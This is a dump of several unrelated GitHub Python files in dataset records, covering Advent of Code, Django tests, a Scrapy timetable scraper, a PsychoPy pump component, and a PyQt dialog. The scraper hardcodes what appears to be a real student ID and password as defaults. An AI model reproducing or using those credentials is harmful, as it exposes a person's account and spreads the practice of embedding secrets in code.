func\n'''","repo_name":"Anushaanil/Book_Maintainance","sub_path":"Decorator_ex.py","file_name":"Decorator_ex.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18268614515","text":"from collections import deque\n\nfrom aoc.utils import load_data, profiler\n\n\n@profiler\ndef part1(data):\n count = 0\n current = data[0]\n for depth in data:\n count += depth > current\n current = depth\n return count\n\n\n@profiler\ndef part2_slice(data):\n count = 0\n last_sum = sum(data[0:3])\n for i in range(1, len(data) - 2):\n current_sum = sum(data[i : i + 3])\n count += current_sum > last_sum\n last_sum = current_sum\n return count\n\n\n@profiler\ndef part2(data: deque[int]):\n count = 0\n window = deque([data.popleft() for _ in range(3)])\n last_sum = sum(window)\n while data:\n window.append(data.popleft())\n window.popleft()\n current_sum = sum(window)\n count += current_sum > last_sum\n last_sum = current_sum\n return count\n\n\ndef main() -> None:\n data = list(map(int, load_data(test=False)))\n print(part1(deque(data)), part2_slice(data), part2(deque(data)), sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RaeedAhmed/advent-of-code","sub_path":"src/2021/01/sonar_sweep.py","file_name":"sonar_sweep.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5079748869","text":"import uuid\nfrom typing import Optional\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom pastas import forms, models\n\nUser = get_user_model()\n\n\nclass PastaFormTestCase(TestCase):\n def test_new_public_pasta_generates_public_id(self):\n form = self._create_and_validate_pasta_form(public=True)\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n self.assertIsNotNone(pasta.public_id)\n\n def test_new_private_pasta_created_without_public_id(self):\n form = self._create_and_validate_pasta_form(public=False)\n\n pasta = form.save()\n\n self.assertFalse(pasta.public)\n self.assertIsNone(pasta.public_id)\n\n def test_making_pasta_private_deletes_public_id(self):\n pasta = _create_pasta(public_id=uuid.uuid4())\n form = self._create_and_validate_pasta_form(public=False, instance=pasta)\n\n pasta = form.save()\n\n self.assertFalse(pasta.public)\n self.assertIsNone(pasta.public_id)\n\n def test_making_pasta_public_creates_public_id(self):\n pasta = _create_pasta()\n form = self._create_and_validate_pasta_form(public=True, instance=pasta)\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n self.assertIsNotNone(pasta.public_id)\n\n def test_user_that_created_pasta_is_saved(self):\n user = User.objects.create_user('Username')\n form = self._create_and_validate_pasta_form(user=user)\n\n pasta = form.save()\n\n self.assertEqual(pasta.created_by, user)\n\n @staticmethod\n def _create_and_validate_pasta_form(public=False, instance: Optional[models.Pasta] = None,\n user: Optional[User] = None) -> forms.PastaForm:\n form = forms.PastaForm({'name': 'Name', 'text': 'Text.', 'public': public}, instance=instance, user=user)\n form.is_valid()\n return form\n\n\nclass PastaPublicFormTestCase(TestCase):\n def test_creating_pasta_generates_public_id(self):\n form = self._create_and_validate_pasta_form()\n\n pasta = form.save()\n\n self.assertTrue(pasta.public)\n\n @staticmethod\n def _create_and_validate_pasta_form():\n form = forms.PastaPublicForm({'name': 'Name', 'text': 'Text.'})\n form.is_valid()\n return form\n\n\ndef _create_pasta(public_id=None) -> models.Pasta:\n pasta = models.Pasta.objects.create(name='Name', text='Text.', public_id=public_id)\n return pasta\n","repo_name":"mlkra/pastas","sub_path":"pastas/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32991509070","text":"from django.db import models\nfrom employees.models import Employee\n# Create your models here.\n\nclass Type(models.Model):\n type = models.CharField('type', max_length=80, unique=True)\n class Meta:\n #set the name of table into admin panel\n verbose_name = \"Types\"\n verbose_name_plural = \"Type\"\n ordering = [\"type\"]\n\n def __str__(self):\n return self.type\n\n\nclass Location(models.Model):\n location = models.CharField('location', max_length=80, unique=True)\n class Meta:\n #set the name of table into admin panel\n verbose_name = \"Locations\"\n verbose_name_plural = \"Location\"\n ordering = [\"location\"]\n\n def __str__(self):\n return self.location\n\n\nclass Item(models.Model):\n item = models.CharField('item', max_length=255)\n number = models.CharField('number', max_length=80)\n hw = models.CharField('HW', max_length=255, blank=True, null=True)\n type = models.ForeignKey(Type, default='', on_delete=models.SET_DEFAULT, null=True )\n owner = models.ForeignKey(Employee, default='', on_delete=models.SET_DEFAULT, null=True )\n location = models.ForeignKey(Location, default='', on_delete=models.SET_DEFAULT, null=True )\n description = models.TextField(blank=True, null=True)","repo_name":"domestos/Django_rest_api","sub_path":"app/inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36015222305","text":"import scrapy\nfrom datetime import datetime\nfrom scrapy.http import FormRequest, Request\nfrom scrapy.utils.response import open_in_browser\nfrom time import strptime\nfrom json import dump\n\nclass Scraper(scrapy.Spider):\n\n name = 'time'\n start_urls = ['https://timetable.ul.ie/Login.aspx?ReturnUrl=%2fStudentTimetable.aspx']\n timetable = {}\n\n def __init__(self, student_id='18238831', pwd='Monday123'): # Input your ID number and password here to see orginal implementation\n self.timetable['class'] = []\n self.timetable['misc'] = {\n 'id': '',\n 'email': '',\n 'pwd': '',\n 'year': 0,\n 'date_time': datetime.now().strftime('%d-%m-%y %H:%M')\n }\n self.timetable['misc']['id'] = student_id\n self.timetable['misc']['email'] = student_id+'@studentmail.ul.ie'\n self.timetable['misc']['pwd'] = pwd\n self.classes = []\n\n\n def parse(self, response):\n token = response.css('#__EVENTVALIDATION::attr(value)').extract_first()\n return FormRequest.from_response(response, formdata={\"__EVENTVALIDATION\": token, \"TextBox_UserName\":self.timetable['misc']['id'], \"TextBox_Password\":self.timetable['misc']['pwd']}, callback=self.LoggedIn)\n\n def LoggedIn(self, response):\n self.timetable['misc']['pwd'] = ''\n student_timetable_link = response.xpath('//*[@id=\"MainContent_StudentTile\"]/a/@href').get()\n return response.follow(student_timetable_link, callback=self.GetTimetable)\n\n def GetTimetable(self, response):\n table = response.css('#MainContent_StudentTimetableGridView')\n days = [0, 1, 2, 3, 4, 5]\n rows = response.css('html body form#ctl01 div.container.body-content div.Grid div table#MainContent_StudentTimetableGridView.cssgridview.table-responsive tbody tr') # ~~~~~~~~~ Point the bot the table grid \n print(rows)\n for row in rows[1:]:\n cells = row.xpath('td') #~~~~~ Use the table selector object to shortent the css path / xpath\n print(cells)\n day = 0\n for cell in cells:\n data = cell.xpath('text()').getall()\n print(data)\n # ['09:00 - 11:00', 'EE4216 - LAB - 2B', ' HAYES (ECE) MARTIN DR', 'Wks:4,8,13']\n for c in data:\n if(c == ' '):\n data.remove(c)\n elif(c==r'\\xa0'):\n break\n #\n if(data == []):\n continue\n #\n print(\"data: \", data)\n start_index = 0\n for d in data:\n start_index += 1\n if(TimeCheck(d)):\n subdata = [d]\n for elem in data[start_index:]:\n print('elem: ', elem)\n if(TimeCheck(elem)):\n break\n else:\n subdata.append(elem)\n \n print(\"subdata: \", subdata)\n new_class = ProcessClassData(subdata, days[day])\n print('processed: ', new_class)\n self.classes.append(new_class)\n \n day+=1\n\n return self.classes\n\n def closed(self, response):\n filename = r'output.json'\n with open(filename, 'w+') as db:\n dump(self.classes, db)\n pass\n\ndef TimeCheck(input):\n try:\n times = input.split('-')\n start_time = times[0].strip()\n end_time = times[1].strip()\n strptime(start_time, '%H:%M')\n strptime(end_time, '%H:%M')\n return True\n except ValueError:\n return False\n except IndexError:\n return False\n\ndef ProcessClassData(class_data, day):\n new_class = {\n 'day': day,\n 'professor': 'Null',\n 'module': 'Null',\n 'group': 'Null',\n 'delivery': 'Null',\n 'location': 'Null',\n 'active_weeks': [],\n 'start_time': '00:00',\n 'end_time': '00:00'\n }\n #\n times = class_data[0].split('-')\n start_time = times[0].strip()\n end_time = times[1].strip()\n #\n class_desc = class_data[1].split('-')\n module = class_desc[0].strip()\n delivery = class_desc[1].strip()\n #\n try:\n group = class_desc[2].strip()\n new_class['group'] = group\n except IndexError as e:\n pass\n #\n try:\n professor = 'Unknown'\n location = ''\n if(len(class_data) < 5):\n # data missing\n unknown_data = class_data[-2].strip()\n location = unknown_data\n professor = unknown_data\n else:\n location = class_data[-2].strip()\n professor = class_data[2].strip()\n new_class['professor'] = professor\n new_class['location'] = location\n except IndexError as e:\n pass\n #\n active_weeks = class_data[-1].replace('Wks:', '').strip()\n active_weeks = active_weeks.split(',')\n #\n new_class['day'] = day\n new_class['start_time'] = start_time\n new_class['end_time'] = end_time\n new_class['module'] = module\n new_class['delivery'] = delivery\n new_class['active_weeks'] = active_weeks\n # \n return new_class","repo_name":"xemmett/ppe","sub_path":"material/demonstration/original_scraper/original_scraper/spiders/old_spider.py","file_name":"old_spider.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21431572828","text":"from os import path\nfrom pathlib import Path\nfrom psychopy.experiment.components import BaseComponent, Param, _translate\nfrom psychopy.localization import _localized as __localized\nimport serial.tools.list_ports\n_localized = __localized.copy()\n\n_localized.update({'pulseDuration': _translate('Pulse duration (s)'),\n 'numberOfPulses': _translate('Number of pulses'),\n 'numberOfSequences': _translate('Number of sequences'),\n 'delayBetweenSeq': _translate('Delay between sequences (s)'),\n 'delayBetweenPulses': _translate('Delay between pulses (s)'),\n 'saveStats': _translate('Save actions of pump and licks to txt file'),\n 'stopVal': _translate('Duration (s)'),\n 'com_port': _translate('COM port'),})\n\n\nclass PeristalticPumpComponent(BaseComponent):\n \"\"\"Delivers a water reward to the animal and monitor licks\"\"\"\n targets = ['PsychoPy']\n categories = ['I/O']\n iconFile = Path(__file__).parent / 'reward.png'\n tooltip = _translate(\n 'LabeoTech Pump: Delivers a water reward to the animal and monitor '\n 'water consumption (licks)')\n\n def __init__(self, exp, parentName, name='reward',\n pulseDuration=0, numberOfPulses = 0, delayBetweenSeq = 0,\n numberOfSequences = 0, delayBetweenPulses = 0,\n startType='time (s)', startVal='0.0', stopVal='1.0',\n stopType='duration (s)', saveStats = False,\n com_port=\"Select pump com port\"):\n\n super(PeristalticPumpComponent, self).__init__(\n exp, parentName, name, startType=startType, startVal=startVal,\n stopType=stopType, stopVal=stopVal\n )\n\n self.type = 'PeristalticPump'\n self.url = 'file:///C:/Users/delam/Desktop/BehavioralTask/pompe_sequence.html'\n # TODO : create a html help page with pump sequence on the options panel\n #self.url = Path(__file__).parent / 'pompe_sequence.html'\n\n # Order in which the user-settable parameters will be displayed\n # in the component's properties window.\n #self.order += ['PulseDuration', # Basic tab]\n\n self.params['pulseDuration'] = Param(\n pulseDuration, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('The duration of the pulse sent to the peristaltic pump'),\n label=_localized['pulseDuration'])\n\n self.params['numberOfPulses'] = Param(\n numberOfPulses, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Number of pulses in a burst sequence'),\n label=_localized['numberOfPulses'])\n\n self.params['delayBetweenSeq'] = Param(\n delayBetweenSeq, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Delay between sequences'),\n label=_localized['delayBetweenSeq'])\n\n self.params['numberOfSequences'] = Param(\n numberOfSequences, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Number of sequence in a single reward event'),\n label=_localized['numberOfSequences'])\n\n self.params['delayBetweenPulses'] = Param(\n delayBetweenPulses, categ='Basic',\n valType='num', inputType=\"single\",\n hint=_translate('Delay between pulses in a burst sequence'),\n label=_localized['delayBetweenPulses'])\n\n self.params['saveStats'] = Param(\n saveStats, categ='Basic',\n valType='bool', inputType=\"bool\",\n hint=_translate('Save log to txt file'),\n label=_localized['saveStats'])\n\n self.params['stopVal'] = Param(\n ((((pulseDuration * numberOfPulses + delayBetweenPulses) *\n (numberOfPulses - 1)) * numberOfSequences) +\n (delayBetweenSeq * (numberOfSequences - 1))),\n categ='Basic', valType='num', inputType=\"single\",\n hint=_translate('The duration of the pulse sent to the peristaltic pump'),\n label=_localized['stopVal'])\n \n self.params['com_port'] = Param(\n com_port, valType='str', inputType=\"choice\", categ='Basic',\n allowedVals=[p.device for p in serial.tools.list_ports.comports()],\n updates='constant',\n hint=_translate(\"COM port\"),\n label=_localized['com_port'])\n\n\n def writeInitCode(self, buff):\n \n \"\"\"Write variable initialisation code.\"\"\"\n code = (\"%(name)s = event.Mouse(win=win)\\n\")\n code += (\"pulse_dur = %(pulseDuration)s\\n\")\n code+= (\"number_pulses = %(numberOfPulses)s\\n\")\n code+= (\"delay_sequences = %(delayBetweenSeq)s\\n\")\n code+= (\"number_sequences = %(numberOfSequences)s\\n\")\n code+= (\"delay_pulses = %(delayBetweenPulses)s\\n\")\n code+= (\"saveStats = %(saveStats)s\\n\")\n code+= (\"import psychopy\\n\")\n code+= (\"import serial\\n\")\n code+= (\"import time\\n\")\n code+=(\"from datetime import datetime\\n\")\n code+= (\"pump = serial.Serial(port=%(com_port)s, baudrate=115200, timeout=.1)\\n\")\n code+= (\"pulse_started = False\\n\")\n code+= (\"reward_start = %(startVal)s\\n\")\n code+=(\"n=0\\n\")\n code+=(\"ns=0\\n\")\n code+=(\"tp0=0\\n\")\n code+=(\"td0=0\\n\")\n code+=(\"ts0=0\\n\")\n code+=(\"firstFrame = False\\n\")\n code+=(\"pause = False\\n\")\n code+=(\"\"\"expInfo = {'participant': '', 'session': '001'}\\n\"\"\")\n code+=(\"\"\"expInfo['date'] = data.getDateStr()\\n\"\"\")\n buff.writeIndented(code % self.params)\n code=(\"\"\"filename_pump = _thisDir + os.sep + u'data/%s_pump_%s' % (expInfo['participant'], expInfo['date'])\\n\"\"\")\n buff.writeIndented(code)\n code=(\"\"\"text_file_pump = open(filename_pump + '.txt', 'w')\\n\"\"\")\n buff.writeIndented(code)\n\n\n def writeRoutineStartCode(self, buff):\n \"\"\"Write the code that will be called at the start of the routine.\"\"\"\n pass\n\n def writeFrameCode(self, buff):\n \n buff.writeIndented(\"if pump.inWaiting():\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"lick_state = pump.readline()\\n\")\n buff.writeIndented(\"\"\"if lick_state == b'l\\\\r\\\\n':\\n\"\"\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"try:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"if behavioral_sys == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"behavioral_sys = True\\n\")\n buff.setIndentLevel(-2, relative=True)\n buff.writeIndented(\"except:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': lick')\\n\"\"\")\n buff.writeIndented(\"if saveStats == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"text_file_pump.write(str(round(t,2)) + 'lick')\\n\"\"\")\n #code+=(\"\"\" lick_state = b''\\n\"\"\")\n buff.setIndentLevel(-4, relative=True)\n \n buff.writeIndented(\"if t>= %(startVal)s and %(name)s.status != FINISHED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"%(name)s.status = STARTED\\n\" % self.params)\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"if firstFrame == False and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n\n buff.writeIndented(\"firstFrame = True\\n\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n buff.writeIndented(\"td=0\\n\")\n buff.writeIndented(\"td0=time.time()\\n\")\n buff.writeIndented(\"ts0=time.time()\\n\")\n buff.writeIndented(\"ts=0\\n\")\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"pulse_started = True\\n\")\n\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"tp = time.time() - tp0\\n\")\n buff.writeIndented(\"ts = time.time() - ts0\\n\")\n buff.writeIndented(\"if tp>= pulse_dur and pulse_started == True and pause == False and firstFrame == True and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"pump.write(bytes('f', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump OFF')\\n\"\"\")\n buff.writeIndented(\"pulse_started = False\\n\")\n buff.writeIndented(\"n+=1\\n\")\n buff.writeIndented(\"td0 = time.time()\\n\")\n\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"td = time.time() - td0\\n\")\n buff.writeIndented(\"if td >= delay_pulses and pulse_started == False and pause == False and firstFrame == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"if not n >= number_pulses :\\n\")\n buff.setIndentLevel(1, relative=True)\n\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n buff.setIndentLevel(-2, relative=True)\n buff.writeIndented(\"if n == number_pulses and %(name)s.status == STARTED and pause == False:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"pump.write(bytes('f', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"ts0 = time.time()\\n\")\n buff.writeIndented(\"pause=True\\n\")\n buff.writeIndented(\"ns+=1\\n\")\n buff.writeIndented(\"n=0\\n\")\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"if ns == number_sequences and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pump.write(bytes('f', 'utf-8'))\\n\")\n buff.writeIndented(\"%(name)s.status = FINISHED\\n\" % self.params)\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"ts = time.time()-ts0\\n\")\n buff.writeIndented(\"if ts >= delay_sequences and pause == True and firstFrame == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pause=False\\n\")\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n \n buff.setIndentLevel(-1, relative=True)\n\n def writeRoutineEndCode(self, buff):\n buff.writeIndented(\"%(name)s.status = 0\\n\" % self.params)\n buff.writeIndented(\"ns = 0\\n\")\n buff.writeIndented(\"n = 0\\n\")\n buff.writeIndented(\"firstFrame = False\\n\")\n buff.writeIndented(\"pause = False\\n\")\n\n\n def writeExperimentEndCode(self, buff):\n pass","repo_name":"psychopy/versions","sub_path":"psychopy/experiment/components/peristalticPump/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"36269373505","text":"def convertBeSangDoc(Num: str):\n \"\"\"\n Chuyển dãy số Num về cách bé Sang đọc\n :param Num: xâu gồm các chữ số\n :return: xâu là cách bé Sang đọc\n \"\"\"\n res = \"\"\n cnt = 1\n for index in range(1, len(Num)):\n if Num[index] != Num[index - 1]:\n res += str(cnt) + str(Num[index-1])\n cnt = 1\n else:\n cnt = cnt + 1\n res += str(cnt) + str(Num[-1])\n return res\n\n\nStr, n = input().split()\nfor i in range(int(n)):\n Str = convertBeSangDoc(Str)\n print(Str)\n","repo_name":"mfnintd/Python_HIT","sub_path":"Buoi5_Kiemtra/Bai4.py","file_name":"Bai4.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9243484113","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QMessageBox\nfrom Services.EquipementServices import getEquipements,deleteEquipement\nfrom .Equipement import Ui_Dialog as Equipement_UI\nfrom .EquipementModify import Ui_Dialog as Equipement_Modif_UI\nclass Ui_Dialog(object):\n def setColortoRow(self,table, rowIndex, color):\n for j in range(table.columnCount()):\n table.item(rowIndex, j).setBackground(color)\n def getSelectedRow(self):\n rows=[]\n for row in range(self.tableWidgetEquipement.rowCount()):\n if self.tableWidgetEquipement.item(row,0).checkState()==QtCore.Qt.CheckState.Checked:\n rows.append(self.tableWidgetEquipement.item(row,0).text())\n return rows\n def modifierEquipement(self):\n ids=self.getSelectedRow()\n if len(ids)>1:\n self.showDialog(\"Error\",\"Impossible d'effectuer cette action sur plus d'une ligne\",False)\n return \n if len(ids)<1:\n self.showDialog(\"Error\",\"Il faut selectionner une ligne\",False)\n return \n self.RedirectEquipementModify(ids[0])\n def RedirectEquipementModify(self,id):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = Equipement_Modif_UI(self.mainWindowSelf,id,self.dialogEquipementList,self)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.addWidget(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def supprimerEquipement(self):\n ids=self.getSelectedRow()\n if len(ids)<1:\n self.showDialog(\"Error\",\"Il faut selectionner au moins une ligne\",False)\n return \n deleteEquipement(ids)\n self.fetchRows()\n def fetchRows(self):\n status,record = getEquipements()\n if status :\n self.tableWidgetEquipement.setColumnCount(6)\n self.tableWidgetEquipement.setHorizontalHeaderLabels([\"Reference\",\"Designation\",\"Role\",\"Fabriquant\",\"DateFabriquation\",\"DateMiseEnMarche\"])\n self.tableWidgetEquipement.setRowCount(len(record))\n\n self.horizontal_header = self.tableWidgetEquipement.horizontalHeader() \n self.horizontal_header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(1, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n self.horizontal_header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)\n self.horizontal_header.setSectionResizeMode(5, QtWidgets.QHeaderView.ResizeToContents)\n for row in range(len(record)):\n for col in range(6):\n item=QtWidgets.QTableWidgetItem(str(record[row][col]))\n self.tableWidgetEquipement.setItem(row,col,item)\n if col ==0:\n item.setFlags(QtCore.Qt.ItemFlag.ItemIsUserCheckable | QtCore.Qt.ItemFlag.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.CheckState.Unchecked)\n self.setColortoRow(self.tableWidgetEquipement,row,QColor(202,225,183)) \n def showDialog(self,title,str,bool):\n msgBox = QMessageBox()\n if bool==False:\n msgBox.setIcon(QMessageBox.Warning)\n else:\n msgBox.setIcon(QMessageBox.Information)\n msgBox.setText(str)\n msgBox.setWindowTitle(title)\n msgBox.setStandardButtons(QMessageBox.Ok)\n msgBox.exec()\n def RedirectEquipement(self):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = Equipement_UI(self.mainWindowSelf)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.addWidget(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def __init__(self,mainWindowSelf,dialogEquipementList) -> None:\n self.mainWindowSelf=mainWindowSelf\n self.dialogEquipementList=dialogEquipementList\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(1018, 810)\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.frame_2 = QtWidgets.QFrame(Dialog)\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame_2)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setAutoFillBackground(False)\n self.label_2.setText(\"\")\n self.label_2.setPixmap(QtGui.QPixmap(\":/icons/icons/service.png\"))\n self.label_2.setAlignment(QtCore.Qt.AlignCenter)\n self.label_2.setWordWrap(False)\n self.label_2.setOpenExternalLinks(True)\n self.label_2.setObjectName(\"label_2\")\n self.horizontalLayout.addWidget(self.label_2)\n self.frame_3 = QtWidgets.QFrame(self.frame_2)\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_3)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.textEdit = QtWidgets.QTextEdit(self.frame_3)\n self.textEdit.setStyleSheet(\"background-color:transparent;\\n\"\n\"border : none;\")\n self.textEdit.setReadOnly(True)\n self.textEdit.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)\n self.textEdit.setObjectName(\"textEdit\")\n self.verticalLayout_2.addWidget(self.textEdit)\n self.ButtonCreerEquipement = QtWidgets.QPushButton(self.frame_3)\n self.ButtonCreerEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonCreerEquipement.setStyleSheet(\"QPushButton{\\n\"\n\"height : 25px;\\n\"\n\"background-color :#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonCreerEquipement.setObjectName(\"ButtonCreerEquipement\")\n self.verticalLayout_2.addWidget(self.ButtonCreerEquipement)\n self.horizontalLayout.addWidget(self.frame_3)\n self.horizontalLayout.setStretch(0, 1)\n self.horizontalLayout.setStretch(1, 2)\n self.verticalLayout.addWidget(self.frame_2)\n self.frame = QtWidgets.QFrame(Dialog)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.frame_4 = QtWidgets.QFrame(self.frame)\n self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_4.setObjectName(\"frame_4\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame_4)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.label = QtWidgets.QLabel(self.frame_4)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setObjectName(\"label\")\n self.horizontalLayout_2.addWidget(self.label)\n self.ButtonModifier = QtWidgets.QPushButton(self.frame_4)\n self.ButtonModifier.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonModifier.setStyleSheet(\"QPushButton{\\n\"\n\"height : 20px;\\n\"\n\"background-color :#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonModifier.setObjectName(\"ButtonModifier\")\n self.horizontalLayout_2.addWidget(self.ButtonModifier)\n self.ButtonSupprimer = QtWidgets.QPushButton(self.frame_4)\n self.ButtonSupprimer.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonSupprimer.setStyleSheet(\"QPushButton{\\n\"\n\"height : 20px;\\n\"\n\"background-color :#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonSupprimer.setObjectName(\"ButtonSupprimer\")\n self.horizontalLayout_2.addWidget(self.ButtonSupprimer)\n self.verticalLayout_3.addWidget(self.frame_4)\n self.tableWidgetEquipement = QtWidgets.QTableWidget(self.frame)\n self.tableWidgetEquipement.setObjectName(\"tableWidgetEquipement\")\n self.tableWidgetEquipement.setColumnCount(0)\n self.tableWidgetEquipement.setRowCount(0)\n self.verticalLayout_3.addWidget(self.tableWidgetEquipement)\n self.verticalLayout.addWidget(self.frame)\n self.verticalLayout.setStretch(0, 1)\n self.verticalLayout.setStretch(1, 2)\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n self.fetchRows()\n \n self.ButtonModifier.clicked.connect(self.modifierEquipement)\n self.ButtonSupprimer.clicked.connect(self.supprimerEquipement)\n self.ButtonCreerEquipement.clicked.connect(self.RedirectEquipement)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.textEdit.setHtml(_translate(\"Dialog\", \"\\n\"\n\"\\n\"\n\"

